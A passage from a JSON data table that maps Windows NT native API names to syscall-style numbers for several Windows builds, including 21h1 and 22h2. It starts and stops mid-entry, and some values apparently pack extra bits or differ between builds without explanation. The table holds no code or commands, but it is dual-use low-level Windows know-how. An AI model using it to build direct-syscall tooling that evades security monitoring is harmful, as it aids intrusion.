"NtFlushBuffersFileEx": 230, "NtFlushInstallUILanguage": 231, "NtFlushInstructionCache": 786664, "NtFlushKey": 196841, "NtFlushProcessWriteBuffers": 234, "NtFlushVirtualMemory": 235, "NtFlushWriteBuffer": 65772, "NtFreeUserPhysicalPages": 237, "NtFreeVirtualMemory": 30, "NtFreezeRegistry": 238, "NtFreezeTransactions": 239, "NtFsControlFile": 1769529, "NtGetCachedSigningLevel": 240, "NtGetCompleteWnfStateSubscription": 241, "NtGetContextThread": 242, "NtGetCurrentProcessorNumber": 1638643, "NtGetCurrentProcessorNumberEx": 244, "NtGetDevicePowerState": 458997, "NtGetMUIRegistryInfo": 246, "NtGetNextProcess": 247, "NtGetNextThread": 248, "NtGetNlsSectionPtr": 249, "NtGetNotificationResourceManager": 250, "NtGetWriteWatch": 251, "NtImpersonateAnonymousToken": 196860, "NtImpersonateClientOfPort": 458783, "NtImpersonateThread": 253, "NtInitializeEnclave": 254, "NtInitializeNlsFiles": 255, "NtInitializeRegistry": 256, "NtInitiatePowerAction": 1114369, "NtIsProcessInJob": 524367, "NtIsSystemResumeAutomatic": 65794, "NtIsUILanguageComitted": 259, "NtListenPort": 260, "NtLoadDriver": 261, "NtLoadEnclaveData": 262, "NtLoadKey": 263, "NtLoadKey2": 264, "NtLoadKey3": 470, "NtLoadKeyEx": 265, "NtLockFile": 266, "NtLockProductActivationKeys": 327947, "NtLockRegistryKey": 196876, "NtLockVirtualMemory": 269, "NtMakePermanentObject": 196878, "NtMakeTemporaryObject": 196879, "NtManageHotPatch": 272, "NtManagePartition": 273, "NtMapCMFModule": 274, "NtMapUserPhysicalPages": 655635, "NtMapUserPhysicalPagesScatter": 655363, "NtMapViewOfSection": 40, "NtMapViewOfSectionEx": 276, "NtModifyBootEntry": 277, "NtModifyDriverEntry": 278, "NtNotifyChangeDirectoryFile": 279, "NtNotifyChangeDirectoryFileEx": 280, "NtNotifyChangeKey": 281, "NtNotifyChangeMultipleKeys": 282, "NtNotifyChangeSession": 283, "NtOpenDirectoryObject": 88, "NtOpenEnlistment": 284, "NtOpenEvent": 64, "NtOpenEventPair": 285, "NtOpenFile": 51, "NtOpenIoCompletion": 286, "NtOpenJobObject": 287, "NtOpenKey": 18, "NtOpenKeyEx": 288, "NtOpenKeyTransacted": 289, "NtOpenKeyTransactedEx": 290, "NtOpenKeyedEvent": 291, "NtOpenMutant": 292, "NtOpenObjectAuditAlarm": 293, "NtOpenPartition": 294, "NtOpenPrivateNamespace": 295, "NtOpenProcess": 38, "NtOpenProcessToken": 296, "NtOpenProcessTokenEx": 48, "NtOpenRegistryTransaction": 297, "NtOpenResourceManager": 298, "NtOpenSection": 55, "NtOpenSemaphore": 299, "NtOpenSession": 300, "NtOpenSymbolicLinkObject": 301, "NtOpenThread": 302, "NtOpenThreadToken": 36, "NtOpenThreadTokenEx": 47, "NtOpenTimer": 303, "NtOpenTransaction": 304, "NtOpenTransactionManager": 305, "NtPlugPlayControl": 306, "NtPowerInformation": 95, "NtPrePrepareComplete": 307, "NtPrePrepareEnlistment": 308, "NtPrepareComplete": 309, "NtPrepareEnlistment": 310, "NtPrivilegeCheck": 786743, "NtPrivilegeObjectAuditAlarm": 312, "NtPrivilegedServiceAuditAlarm": 313, "NtPropagationComplete": 314, "NtPropagationFailed": 315, "NtProtectVirtualMemory": 80, "NtPssCaptureVaSpaceBulk": 316, "NtPulseEvent": 459069, "NtQueryAttributesFile": 61, "NtQueryAuxiliaryCounterFrequency": 318, "NtQueryBootEntryOrder": 319, "NtQueryBootOptions": 320, "NtQueryDebugFilterState": 328001, "NtQueryDefaultLocale": 327701, "NtQueryDefaultUILanguage": 262212, "NtQueryDirectoryFile": 53, "NtQueryDirectoryFileEx": 322, "NtQueryDirectoryObject": 323, "NtQueryDriverEntryOrder": 324, "NtQueryEaFile": 325, "NtQueryEvent": 86, "NtQueryFullAttributesFile": 326, "NtQueryInformationAtom": 327, "NtQueryInformationByName": 328, "NtQueryInformationEnlistment": 329, "NtQueryInformationFile": 17, "NtQueryInformationJobObject": 330, "NtQueryInformationPort": 331, "NtQueryInformationProcess": 25, "NtQueryInformationResourceManager": 332, "NtQueryInformationThread": 37, "NtQueryInformationToken": 33, "NtQueryInformationTransaction": 333, "NtQueryInformationTransactionManager": 334, "NtQueryInformationWorkerFactory": 335, "NtQueryInstallUILanguage": 262480, "NtQueryIntervalProfile": 328017, "NtQueryIoCompletion": 338, "NtQueryKey": 22, "NtQueryLicenseValue": 339, "NtQueryMultipleValueKey": 340, "NtQueryMutant": 341, "NtQueryObject": 272, "NtQueryOpenSubKeys": 342, "NtQueryOpenSubKeysEx": 343, "NtQueryPerformanceCounter": 327729, "NtQueryPortInformationProcess": 65880, "NtQueryQuotaInformationFile": 345, "NtQuerySection": 81, "NtQuerySecurityAttributesToken": 346, "NtQuerySecurityObject": 347, "NtQuerySecurityPolicy": 348, "NtQuerySemaphore": 349, "NtQuerySymbolicLinkObject": 350, "NtQuerySystemEnvironmentValue": 351, "NtQuerySystemEnvironmentValueEx": 352, "NtQuerySystemInformation": 54, "NtQuerySystemInformationEx": 353, "NtQueryTimer": 56, "NtQueryTimerResolution": 655714, "NtQueryValueKey": 23, "NtQueryVirtualMemory": 35, "NtQueryVolumeInformationFile": 73, "NtQueryWnfStateData": 355, "NtQueryWnfStateNameInformation": 356, "NtQueueApcThread": 69, "NtQueueApcThreadEx": 357, "NtRaiseException": 358, "NtRaiseHardError": 359, "NtReadFile": 1703942, "NtReadFileScatter": 1703982, "NtReadOnlyEnlistment": 360, "NtReadRequestData": 84, "NtReadVirtualMemory": 63, "NtRecoverEnlistment": 361, "NtRecoverResourceManager": 362, "NtRecoverTransactionManager": 363, "NtRegisterProtocolAddressInformation": 364, "NtRegisterThreadTerminatePort": 196973, "NtReleaseKeyedEvent": 1311086, "NtReleaseMutant": 458784, "NtReleaseSemaphore": 786442, "NtReleaseWorkerFactoryWorker": 196975, "NtRemoveIoCompletion": 1835017, "NtRemoveIoCompletionEx": 368, "NtRenameKey": 370, "NtRenameTransactionManager": 371, "NtReplaceKey": 372, "NtReplacePartitionUnit": 373, "NtReplyPort": 12, "NtReplyWaitReceivePort": 11, "NtReplyWaitReceivePortEx": 43, "NtReplyWaitReplyPort": 374, "NtRequestPort": 375, "NtRequestWaitReplyPort": 34, "NtResetEvent": 459128, "NtResetWriteWatch": 786809, "NtRestoreKey": 378, "NtResumeProcess": 196987, "NtResumeThread": 458834, "NtRevertContainerImpersonation": 380, "NtRollbackComplete": 381, "NtRollbackEnlistment": 382, "NtRollbackRegistryTransaction": 383, "NtRollbackTransaction": 384, "NtRollforwardTransactionManager": 385, "NtSaveKey": 524674, "NtSaveKeyEx": 917891, "NtSaveMergedKeys": 721284, "NtSecureConnectPort": 389, "NtSerializeBoot": 390, "NtSetBootEntryOrder": 391, "NtSetBootOptions": 392, "NtSetCachedSigningLevel": 393, "NtSetCachedSigningLevel2": 394, "NtSetContextThread": 395, "NtSetDebugFilterState": 655756, "NtSetDefaultHardErrorPort": 197005, "NtSetDefaultLocale": 328078, "NtSetDefaultUILanguage": 262543, "NtSetDriverEntryOrder": 400, "NtSetEaFile": 401, "NtSetEvent": 458766, "NtSetEventBoostPriority": 196653, "NtSetHighEventPair": 197010, "NtSetHighWaitLowEventPair": 197011, "NtSetIRTimer": 459156, "NtSetInformationDebugObject": 405, "NtSetInformationEnlistment": 406, "NtSetInformationFile": 39, "NtSetInformationJobObject": 407, "NtSetInformationKey": 408, "NtSetInformationObject": 92, "NtSetInformationProcess": 28, "NtSetInformationResourceManager": 409, "NtSetInformationSymbolicLink": 410, "NtSetInformationThread": 13, "NtSetInformationToken": 411, "NtSetInformationTransaction": 412, "NtSetInformationTransactionManager": 413, "NtSetInformationVirtualMemory": 414, "NtSetInformationWorkerFactory": 415, "NtSetIntervalProfile": 328096, "NtSetIoCompletion": 417, "NtSetIoCompletionEx": 418, "NtSetLdtEntries": 419, "NtSetLowEventPair": 197028, "NtSetLowWaitHighEventPair": 197029, "NtSetQuotaInformationFile": 422, "NtSetSecurityObject": 423, "NtSetSystemEnvironmentValue": 424, "NtSetSystemEnvironmentValueEx": 425, "NtSetSystemInformation": 426, "NtSetSystemPowerState": 427, "NtSetSystemTime": 328108, "NtSetThreadExecutionState": 328109, "NtSetTimer": 98, "NtSetTimer2": 430, "NtSetTimerEx": 431, "NtSetTimerResolution": 655792, "NtSetUuidSeed": 262577, "NtSetValueKey": 96, "NtSetVolumeInformationFile": 434, "NtSetWnfProcessNotificationEvent": 435, "NtShutdownSystem": 262580, "NtShutdownWorkerFactory": 437, "NtSignalAndWaitForSingleObject": 197046, "NtSinglePhaseReject": 439, "NtStartProfile": 197048, "NtStopProfile": 197049, "NtSubscribeWnfStateChange": 442, "NtSuspendProcess": 197051, "NtSuspendThread": 459196, "NtSystemDebugControl": 445, "NtTerminateEnclave": 446, "NtTerminateJobObject": 459199, "NtTerminateProcess": 458796, "NtTerminateThread": 458835, "NtTestAlert": 131520, "NtThawRegistry": 449, "NtThawTransactions": 450, "NtTraceControl": 451, "NtTraceEvent": 94, "NtTranslateFilePath": 1114564, "NtUmsThreadYield": 453, "NtUnloadDriver": 454, "NtUnloadKey": 455, "NtUnloadKey2": 456, "NtUnloadKeyEx": 457, "NtUnlockFile": 458, "NtUnlockVirtualMemory": 459, "NtUnmapViewOfSection": 42, "NtUnmapViewOfSectionEx": 460, "NtUnsubscribeWnfStateChange": 461, "NtUpdateWnfStateData": 462, "NtVdmControl": 463, "NtWaitForAlertByThreadId": 393680, "NtWaitForDebugEvent": 465, "NtWaitForKeyedEvent": 1376722, "NtWaitForMultipleObjects": 1900635, "NtWaitForMultipleObjects32": 1966106, "NtWaitForSingleObject": 851972, "NtWaitForWorkViaWorkerFactory": 467, "NtWaitHighEventPair": 197076, "NtWaitLowEventPair": 197077, "NtWorkerFactoryWorkerReady": 196609, "NtWriteFile": 1703944, "NtWriteFileGather": 1703963, "NtWriteRequestData": 87, "NtWriteVirtualMemory": 58, "NtYieldExecution": 65606, "RtlGetNativeSystemInformation": 54}, "21h1":{"NtAccessCheck": 0, "NtAccessCheckAndAuditAlarm": 41, "NtAccessCheckByType": 99, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireCrossVmMutant": 103, "NtAcquireProcessActivityReference": 104, "NtAddAtom": 655431, "NtAddAtomEx": 1114217, "NtAddBootEntry": 106, "NtAddDriverEntry": 107, "NtAdjustGroupsToken": 108, "NtAdjustPrivilegesToken": 65, "NtAdjustTokenClaimsAndDeviceGroups": 109, "NtAlertResumeThread": 458862, "NtAlertThread": 196719, "NtAlertThreadByThreadId": 262256, "NtAllocateLocallyUniqueId": 262257, "NtAllocateReserveObject": 114, "NtAllocateUserPhysicalPages": 115, "NtAllocateUserPhysicalPagesEx": 116, "NtAllocateUuids": 1114229, "NtAllocateVirtualMemory": 24, "NtAllocateVirtualMemoryEx": 118, "NtAlpcAcceptConnectPort": 119, "NtAlpcCancelMessage": 120, "NtAlpcConnectPort": 121, "NtAlpcConnectPortEx": 122, "NtAlpcCreatePort": 123, "NtAlpcCreatePortSection": 124, "NtAlpcCreateResourceReserve": 125, "NtAlpcCreateSectionView": 126, "NtAlpcCreateSecurityContext": 127, "NtAlpcDeletePortSection": 128, "NtAlpcDeleteResourceReserve": 129, "NtAlpcDeleteSectionView": 130, "NtAlpcDeleteSecurityContext": 131, "NtAlpcDisconnectPort": 132, "NtAlpcImpersonateClientContainerOfPort": 133, "NtAlpcImpersonateClientOfPort": 134, "NtAlpcOpenSenderProcess": 135, "NtAlpcOpenSenderThread": 136, "NtAlpcQueryInformation": 137, "NtAlpcQueryInformationMessage": 138, "NtAlpcRevokeSecurityContext": 139, "NtAlpcSendWaitReceivePort": 140, "NtAlpcSetInformation": 141, "NtApphelpCacheControl": 76, "NtAreMappedFilesTheSame": 327822, "NtAssignProcessToJobObject": 524431, "NtAssociateWaitCompletionPacket": 144, "NtCallEnclave": 145, "NtCallbackReturn": 5, "NtCancelIoFile": 93, "NtCancelIoFileEx": 146, "NtCancelSynchronousIoFile": 147, "NtCancelTimer": 458849, "NtCancelTimer2": 148, "NtCancelWaitCompletionPacket": 149, "NtClearEvent": 196670, "NtClose": 196623, "NtCloseObjectAuditAlarm": 59, "NtCommitComplete": 150, "NtCommitEnlistment": 151, "NtCommitRegistryTransaction": 152, "NtCommitTransaction": 153, "NtCompactKeys": 154, "NtCompareObjects": 155, "NtCompareSigningLevels": 156, "NtCompareTokens": 157, "NtCompleteConnectPort": 158, "NtCompressKey": 196767, "NtConnectPort": 160, "NtContinue": 67, "NtContinueEx": 161, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 162, "NtCreateCrossVmEvent": 163, "NtCreateCrossVmMutant": 164, "NtCreateDebugObject": 165, "NtCreateDirectoryObject": 166, "NtCreateDirectoryObjectEx": 167, "NtCreateEnclave": 168, "NtCreateEnlistment": 169, "NtCreateEvent": 72, "NtCreateEventPair": 170, "NtCreateFile": 85, "NtCreateIRTimer": 171, "NtCreateIoCompletion": 172, "NtCreateJobObject": 173, "NtCreateJobSet": 174, "NtCreateKey": 29, "NtCreateKeyTransacted": 175, "NtCreateKeyedEvent": 176, "NtCreateLowBoxToken": 177, "NtCreateMailslotFile": 178, "NtCreateMutant": 179, "NtCreateNamedPipeFile": 180, "NtCreatePagingFile": 181, "NtCreatePartition": 182, "NtCreatePort": 183, "NtCreatePrivateNamespace": 184, "NtCreateProcess": 185, "NtCreateProcessEx": 77, "NtCreateProfile": 186, "NtCreateProfileEx": 187, "NtCreateRegistryTransaction": 188, "NtCreateResourceManager": 189, "NtCreateSection": 74, "NtCreateSectionEx": 190, "NtCreateSemaphore": 191, "NtCreateSymbolicLinkObject": 192, "NtCreateThread": 78, "NtCreateThreadEx": 193, "NtCreateTimer": 194, "NtCreateTimer2": 195, "NtCreateToken": 196, "NtCreateTokenEx": 197, "NtCreateTransaction": 198, "NtCreateTransactionManager": 199, "NtCreateUserProcess": 200, "NtCreateWaitCompletionPacket": 201, "NtCreateWaitablePort": 202, "NtCreateWnfStateName": 203, "NtCreateWorkerFactory": 204, "NtDebugActiveProcess": 524493, "NtDebugContinue": 206, "NtDelayExecution": 393268, "NtDeleteAtom": 262351, "NtDeleteBootEntry": 208, "NtDeleteDriverEntry": 209, "NtDeleteFile": 210, "NtDeleteKey": 211, "NtDeleteObjectAuditAlarm": 212, "NtDeletePrivateNamespace": 213, "NtDeleteValueKey": 214, "NtDeleteWnfStateData": 215, "NtDeleteWnfStateName": 216, "NtDeviceIoControlFile": 1769479, "NtDirectGraphicsCall": 217, "NtDisableLastKnownGood": 218, "NtDisplayString": 219, "NtDrawText": 220, "NtDuplicateObject": 60, "NtDuplicateToken": 66, "NtEnableLastKnownGood": 221, "NtEnumerateBootEntries": 222, "NtEnumerateDriverEntries": 223, "NtEnumerateKey": 50, "NtEnumerateSystemEnvironmentValuesEx": 224, "NtEnumerateTransactionObject": 225, "NtEnumerateValueKey": 19, "NtExtendSection": 226, "NtFilterBootOption": 227, "NtFilterToken": 228, "NtFilterTokenEx": 229, "NtFindAtom": 655380, "NtFlushBuffersFile": 75, "NtFlushBuffersFileEx": 230, "NtFlushInstallUILanguage": 231, "NtFlushInstructionCache": 786664, "NtFlushKey": 196841, "NtFlushProcessWriteBuffers": 234, "NtFlushVirtualMemory": 235, "NtFlushWriteBuffer": 65772, "NtFreeUserPhysicalPages": 237, "NtFreeVirtualMemory": 30, "NtFreezeRegistry": 238, "NtFreezeTransactions": 239, "NtFsControlFile": 1769529, "NtGetCachedSigningLevel": 240, "NtGetCompleteWnfStateSubscription": 241, "NtGetContextThread": 242, "NtGetCurrentProcessorNumber": 1638643, "NtGetCurrentProcessorNumberEx": 244, "NtGetDevicePowerState": 458997, "NtGetMUIRegistryInfo": 246, "NtGetNextProcess": 247, "NtGetNextThread": 248, "NtGetNlsSectionPtr": 249, "NtGetNotificationResourceManager": 250, "NtGetWriteWatch": 251, "NtImpersonateAnonymousToken": 196860, "NtImpersonateClientOfPort": 458783, "NtImpersonateThread": 253, "NtInitializeEnclave": 254, "NtInitializeNlsFiles": 255, "NtInitializeRegistry": 256, "NtInitiatePowerAction": 1114369, "NtIsProcessInJob": 524367, "NtIsSystemResumeAutomatic": 65794, "NtIsUILanguageComitted": 259, "NtListenPort": 260, "NtLoadDriver": 261, "NtLoadEnclaveData": 262, "NtLoadKey": 263, "NtLoadKey2": 264, "NtLoadKey3": 470, "NtLoadKeyEx": 265, "NtLockFile": 266, "NtLockProductActivationKeys": 327947, "NtLockRegistryKey": 196876, "NtLockVirtualMemory": 269, "NtMakePermanentObject": 196878, "NtMakeTemporaryObject": 196879, "NtManageHotPatch": 272, "NtManagePartition": 273, "NtMapCMFModule": 274, "NtMapUserPhysicalPages": 655635, "NtMapUserPhysicalPagesScatter": 655363, "NtMapViewOfSection": 40, "NtMapViewOfSectionEx": 276, "NtModifyBootEntry": 277, "NtModifyDriverEntry": 278, "NtNotifyChangeDirectoryFile": 279, "NtNotifyChangeDirectoryFileEx": 280, "NtNotifyChangeKey": 281, "NtNotifyChangeMultipleKeys": 282, "NtNotifyChangeSession": 283, "NtOpenDirectoryObject": 88, "NtOpenEnlistment": 284, "NtOpenEvent": 64, "NtOpenEventPair": 285, "NtOpenFile": 51, "NtOpenIoCompletion": 286, "NtOpenJobObject": 287, "NtOpenKey": 18, "NtOpenKeyEx": 288, "NtOpenKeyTransacted": 289, "NtOpenKeyTransactedEx": 290, "NtOpenKeyedEvent": 291, "NtOpenMutant": 292, "NtOpenObjectAuditAlarm": 293, "NtOpenPartition": 294, "NtOpenPrivateNamespace": 295, "NtOpenProcess": 38, "NtOpenProcessToken": 296, "NtOpenProcessTokenEx": 48, "NtOpenRegistryTransaction": 297, "NtOpenResourceManager": 298, "NtOpenSection": 55, "NtOpenSemaphore": 299, "NtOpenSession": 300, "NtOpenSymbolicLinkObject": 301, "NtOpenThread": 302, "NtOpenThreadToken": 36, "NtOpenThreadTokenEx": 47, "NtOpenTimer": 303, "NtOpenTransaction": 304, "NtOpenTransactionManager": 305, "NtPlugPlayControl": 306, "NtPowerInformation": 95, "NtPrePrepareComplete": 307, "NtPrePrepareEnlistment": 308, "NtPrepareComplete": 309, "NtPrepareEnlistment": 310, "NtPrivilegeCheck": 786743, "NtPrivilegeObjectAuditAlarm": 312, "NtPrivilegedServiceAuditAlarm": 313, "NtPropagationComplete": 314, "NtPropagationFailed": 315, "NtProtectVirtualMemory": 80, "NtPssCaptureVaSpaceBulk": 316, "NtPulseEvent": 459069, "NtQueryAttributesFile": 61, "NtQueryAuxiliaryCounterFrequency": 318, "NtQueryBootEntryOrder": 319, "NtQueryBootOptions": 320, "NtQueryDebugFilterState": 328001, "NtQueryDefaultLocale": 327701, "NtQueryDefaultUILanguage": 262212, "NtQueryDirectoryFile": 53, "NtQueryDirectoryFileEx": 322, "NtQueryDirectoryObject": 323, "NtQueryDriverEntryOrder": 324, "NtQueryEaFile": 325, "NtQueryEvent": 86, "NtQueryFullAttributesFile": 326, "NtQueryInformationAtom": 327, "NtQueryInformationByName": 328, "NtQueryInformationEnlistment": 329, "NtQueryInformationFile": 17, "NtQueryInformationJobObject": 330, "NtQueryInformationPort": 331, "NtQueryInformationProcess": 25, "NtQueryInformationResourceManager": 332, "NtQueryInformationThread": 37, "NtQueryInformationToken": 33, "NtQueryInformationTransaction": 333, "NtQueryInformationTransactionManager": 334, "NtQueryInformationWorkerFactory": 335, "NtQueryInstallUILanguage": 262480, "NtQueryIntervalProfile": 328017, "NtQueryIoCompletion": 338, "NtQueryKey": 22, "NtQueryLicenseValue": 339, "NtQueryMultipleValueKey": 340, "NtQueryMutant": 341, "NtQueryObject": 16, "NtQueryOpenSubKeys": 342, "NtQueryOpenSubKeysEx": 343, "NtQueryPerformanceCounter": 327729, "NtQueryPortInformationProcess": 65880, "NtQueryQuotaInformationFile": 345, "NtQuerySection": 81, "NtQuerySecurityAttributesToken": 346, "NtQuerySecurityObject": 347, "NtQuerySecurityPolicy": 348, "NtQuerySemaphore": 349, "NtQuerySymbolicLinkObject": 350, "NtQuerySystemEnvironmentValue": 351, "NtQuerySystemEnvironmentValueEx": 352, "NtQuerySystemInformation": 54, "NtQuerySystemInformationEx": 353, "NtQueryTimer": 56, "NtQueryTimerResolution": 655714, "NtQueryValueKey": 23, "NtQueryVirtualMemory": 35, "NtQueryVolumeInformationFile": 73, "NtQueryWnfStateData": 355, "NtQueryWnfStateNameInformation": 356, "NtQueueApcThread": 69, "NtQueueApcThreadEx": 357, "NtRaiseException": 358, "NtRaiseHardError": 359, "NtReadFile": 1703942, "NtReadFileScatter": 1703982, "NtReadOnlyEnlistment": 360, "NtReadRequestData": 84, "NtReadVirtualMemory": 63, "NtRecoverEnlistment": 361, "NtRecoverResourceManager": 362, "NtRecoverTransactionManager": 363, "NtRegisterProtocolAddressInformation": 364, "NtRegisterThreadTerminatePort": 196973, "NtReleaseKeyedEvent": 1311086, "NtReleaseMutant": 458784, "NtReleaseSemaphore": 786442, "NtReleaseWorkerFactoryWorker": 196975, "NtRemoveIoCompletion": 1835017, "NtRemoveIoCompletionEx": 368, "NtRenameKey": 370, "NtRenameTransactionManager": 371, "NtReplaceKey": 372, "NtReplacePartitionUnit": 373, "NtReplyPort": 12, "NtReplyWaitReceivePort": 11, "NtReplyWaitReceivePortEx": 43, "NtReplyWaitReplyPort": 374, "NtRequestPort": 375, "NtRequestWaitReplyPort": 34, "NtResetEvent": 459128, "NtResetWriteWatch": 786809, "NtRestoreKey": 378, "NtResumeProcess": 196987, "NtResumeThread": 458834, "NtRevertContainerImpersonation": 380, "NtRollbackComplete": 381, "NtRollbackEnlistment": 382, "NtRollbackRegistryTransaction": 383, "NtRollbackTransaction": 384, "NtRollforwardTransactionManager": 385, "NtSaveKey": 524674, "NtSaveKeyEx": 917891, "NtSaveMergedKeys": 721284, "NtSecureConnectPort": 389, "NtSerializeBoot": 390, "NtSetBootEntryOrder": 391, "NtSetBootOptions": 392, "NtSetCachedSigningLevel": 393, "NtSetCachedSigningLevel2": 394, "NtSetContextThread": 395, "NtSetDebugFilterState": 655756, "NtSetDefaultHardErrorPort": 197005, "NtSetDefaultLocale": 328078, "NtSetDefaultUILanguage": 262543, "NtSetDriverEntryOrder": 400, "NtSetEaFile": 401, "NtSetEvent": 458766, "NtSetEventBoostPriority": 196653, "NtSetHighEventPair": 197010, "NtSetHighWaitLowEventPair": 197011, "NtSetIRTimer": 459156, "NtSetInformationDebugObject": 405, "NtSetInformationEnlistment": 406, "NtSetInformationFile": 39, "NtSetInformationJobObject": 407, "NtSetInformationKey": 408, "NtSetInformationObject": 92, "NtSetInformationProcess": 28, "NtSetInformationResourceManager": 409, "NtSetInformationSymbolicLink": 410, "NtSetInformationThread": 13, "NtSetInformationToken": 411, "NtSetInformationTransaction": 412, "NtSetInformationTransactionManager": 413, "NtSetInformationVirtualMemory": 414, "NtSetInformationWorkerFactory": 415, "NtSetIntervalProfile": 328096, "NtSetIoCompletion": 417, "NtSetIoCompletionEx": 418, "NtSetLdtEntries": 419, "NtSetLowEventPair": 197028, "NtSetLowWaitHighEventPair": 197029, "NtSetQuotaInformationFile": 422, "NtSetSecurityObject": 423, "NtSetSystemEnvironmentValue": 424, "NtSetSystemEnvironmentValueEx": 425, "NtSetSystemInformation": 426, "NtSetSystemPowerState": 427, "NtSetSystemTime": 328108, "NtSetThreadExecutionState": 328109, "NtSetTimer": 98, "NtSetTimer2": 430, "NtSetTimerEx": 431, "NtSetTimerResolution": 655792, "NtSetUuidSeed": 262577, "NtSetValueKey": 96, "NtSetVolumeInformationFile": 434, "NtSetWnfProcessNotificationEvent": 435, "NtShutdownSystem": 262580, "NtShutdownWorkerFactory": 437, "NtSignalAndWaitForSingleObject": 1245622, "NtSinglePhaseReject": 439, "NtStartProfile": 197048, "NtStopProfile": 197049, "NtSubscribeWnfStateChange": 442, "NtSuspendProcess": 197051, "NtSuspendThread": 459196, "NtSystemDebugControl": 445, "NtTerminateEnclave": 446, "NtTerminateJobObject": 459199, "NtTerminateProcess": 458796, "NtTerminateThread": 458835, "NtTestAlert": 131520, "NtThawRegistry": 449, "NtThawTransactions": 450, "NtTraceControl": 451, "NtTraceEvent": 94, "NtTranslateFilePath": 1114564, "NtUmsThreadYield": 453, "NtUnloadDriver": 454, "NtUnloadKey": 455, "NtUnloadKey2": 456, "NtUnloadKeyEx": 457, "NtUnlockFile": 458, "NtUnlockVirtualMemory": 459, "NtUnmapViewOfSection": 42, "NtUnmapViewOfSectionEx": 460, "NtUnsubscribeWnfStateChange": 461, "NtUpdateWnfStateData": 462, "NtVdmControl": 463, "NtWaitForAlertByThreadId": 393680, "NtWaitForDebugEvent": 465, "NtWaitForKeyedEvent": 1376722, "NtWaitForMultipleObjects": 1900635, "NtWaitForMultipleObjects32": 1966106, "NtWaitForSingleObject": 851972, "NtWaitForWorkViaWorkerFactory": 467, "NtWaitHighEventPair": 197076, "NtWaitLowEventPair": 197077, "NtWorkerFactoryWorkerReady": 196609, "NtWriteFile": 1703944, "NtWriteFileGather": 1703963, "NtWriteRequestData": 87, "NtWriteVirtualMemory": 58, "NtYieldExecution": 65606}, "22h2": {"NtWorkerFactoryWorkerReady": 196609, "NtMapUserPhysicalPagesScatter": 655363, "NtWaitForMultipleObjects32": 1966106, "NtReplyWaitReceivePortEx": 43, "NtQueryDefaultUILanguage": 262212, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtIsProcessInJob": 524367, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAddAtomEx": 1114217, "NtAddBootEntry": 106, "NtAddDriverEntry": 107, "NtAdjustTokenClaimsAndDeviceGroups": 109, "NtAlertThreadByThreadId": 262256, "NtAllocateReserveObject": 114, "NtGetNextProcess": 247, "NtGetNextThread": 248, "NtQueueApcThreadEx": 357, "NtUmsThreadYield": 453, "NtAllocateUserPhysicalPages": 115, "NtAllocateVirtualMemoryEx": 118, "NtAlpcAcceptConnectPort": 119, "NtAlpcCancelMessage": 120, "NtAlpcCreatePort": 123, "NtAlpcCreatePortSection": 124, "NtAlpcCreateResourceReserve": 125, "NtAlpcCreateSectionView": 126, "NtAlpcCreateSecurityContext": 127, "NtAlpcDeletePortSection": 128, "NtAlpcDeleteResourceReserve": 129, "NtAlpcDeleteSectionView": 130, "NtAlpcDeleteSecurityContext": 131, "NtAlpcDisconnectPort": 132, "NtAlpcImpersonateClientOfPort": 134, "NtAlpcOpenSenderProcess": 135, "NtAlpcOpenSenderThread": 136, "NtAlpcQueryInformation": 137, "NtAlpcQueryInformationMessage": 138, "NtAlpcRevokeSecurityContext": 139, "NtAlpcSendWaitReceivePort": 140, "NtAlpcSetInformation": 141, "NtEnumerateBootEntries": 222, "NtEnumerateDriverEntries": 223, "NtEnumerateSystemEnvironmentValuesEx": 224, "NtQueryBootEntryOrder": 319, "NtQueryBootOptions": 320, "NtQueryDriverEntryOrder": 324, "NtQuerySystemEnvironmentValueEx": 352, "NtSetBootEntryOrder": 391, "NtSetDriverEntryOrder": 400, "NtQuerySystemInformationEx": 353, "NtInitializeNlsFiles": 255, "NtCreateProfileEx": 187, "NtCreateWorkerFactory": 204, "NtFlushInstallUILanguage": 231, "NtGetMUIRegistryInfo": 246, "NtGetNlsSectionPtr": 249, "NtIsUILanguageComitted": 259, "NtReleaseWorkerFactoryWorker": 196975, "NtQueryInformationWorkerFactory": 335, "NtSetInformationWorkerFactory": 415, "NtWaitForWorkViaWorkerFactory": 467, "NtShutdownWorkerFactory": 437, "NtSetTimerEx": 431, "NtCancelTimer2": 148, "NtSetTimer2": 430, "NtQueryWnfStateData": 355, "NtUpdateWnfStateData": 462, "NtDisableLastKnownGood": 218, "NtEnableLastKnownGood": 221, "NtCancelSynchronousIoFile": 147, "NtSetIoCompletion": 417, "NtSetIoCompletionEx": 418, "NtRemoveIoCompletionEx": 368, "NtNotifyChangeSession": 283, "NtAssociateWaitCompletionPacket": 144, "NtFlushProcessWriteBuffers": 234, "NtCommitComplete": 150, "NtCommitEnlistment": 151, "NtCommitTransaction": 153, "NtCreateEnlistment": 169, "NtCreateResourceManager": 189, "NtCreateTransaction": 198, "NtCreateTransactionManager": 199, "NtEnumerateTransactionObject": 225, "NtFreezeTransactions": 239, "NtGetNotificationResourceManager": 250, "NtOpenEnlistment": 284, "NtOpenResourceManager": 298, "NtOpenTransaction": 304, "NtOpenTransactionManager": 305, "NtPrepareComplete": 309, "NtPrepareEnlistment": 310, "NtPrePrepareComplete": 307, "NtPrePrepareEnlistment": 308, "NtPropagationComplete": 314, "NtPropagationFailed": 315, "NtQueryInformationEnlistment": 329, "NtQueryInformationResourceManager": 332, "NtQueryInformationTransaction": 333, "NtQueryInformationTransactionManager": 334, "NtReadOnlyEnlistment": 360, "NtRecoverEnlistment": 361, "NtRecoverResourceManager": 362, "NtRecoverTransactionManager": 363, "NtRegisterProtocolAddressInformation": 364, "NtRenameTransactionManager": 371, "NtRollbackComplete": 381, "NtRollbackEnlistment": 382, "NtRollbackTransaction": 384, "NtRollforwardTransactionManager": 385, "NtSetInformationEnlistment": 406, "NtSetInformationResourceManager": 409, "NtSetInformationTransaction": 412, "NtSetInformationTransactionManager": 413, "NtSinglePhaseReject": 439, "NtThawRegistry": 